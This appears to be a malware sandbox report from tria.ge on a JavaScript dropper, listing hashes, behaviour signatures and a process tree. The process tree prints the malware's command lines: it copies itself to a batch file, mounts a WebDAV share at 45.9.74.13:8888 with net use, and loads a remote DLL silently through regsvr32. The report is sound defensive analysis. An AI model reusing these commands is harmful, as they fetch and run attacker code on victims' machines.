Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    10/07/2024, 01:02

General

  • Target

    04c2348f657a19c89f4e6e13dd0bb86b72908ca0a3390b87b0d7ea79d91d0e7d.js

  • Size

    5KB

  • MD5

    81ff023b48275d5a6b535a2370fce4a3

  • SHA1

    9de4cdf4c8e6598f2aeb2529b2e2036ed5eedd7f

  • SHA256

    04c2348f657a19c89f4e6e13dd0bb86b72908ca0a3390b87b0d7ea79d91d0e7d

  • SHA512

    47f381a7ba1c3952320761dcc01b87094e576ecb7cefb306d6aaddf925a7e1174a0824766e81a166641cbb2e2723506c451c3d4d05f8d8e26c2be93d33f73849

  • SSDEEP

    96:1cmrqBIO0hGCoFWU6660aBFWU6660WowHZJAcn2PqjVRQ6iVpPkY:1vqaUCoFWU6665BFWU666PMS2PqjVRgF

Score
3/10

Malware Config

Signatures

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs net.exe
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\04c2348f657a19c89f4e6e13dd0bb86b72908ca0a3390b87b0d7ea79d91d0e7d.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1712
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\04c2348f657a19c89f4e6e13dd0bb86b72908ca0a3390b87b0d7ea79d91d0e7d.js" "C:\Users\Admin\\afzwlo.bat" && "C:\Users\Admin\\afzwlo.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3052
      • C:\Windows\system32\net.exe
        net use \\45.9.74.13@8888\DavWWWRoot\
        3⤵
          PID:2584
        • C:\Windows\system32\regsvr32.exe
          regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\220.dll
          3⤵
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:2812

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\afzwlo.bat

      Filesize

      5KB

      MD5

      81ff023b48275d5a6b535a2370fce4a3

      SHA1

      9de4cdf4c8e6598f2aeb2529b2e2036ed5eedd7f

      SHA256

      04c2348f657a19c89f4e6e13dd0bb86b72908ca0a3390b87b0d7ea79d91d0e7d

      SHA512

      47f381a7ba1c3952320761dcc01b87094e576ecb7cefb306d6aaddf925a7e1174a0824766e81a166641cbb2e2723506c451c3d4d05f8d8e26c2be93d33f73849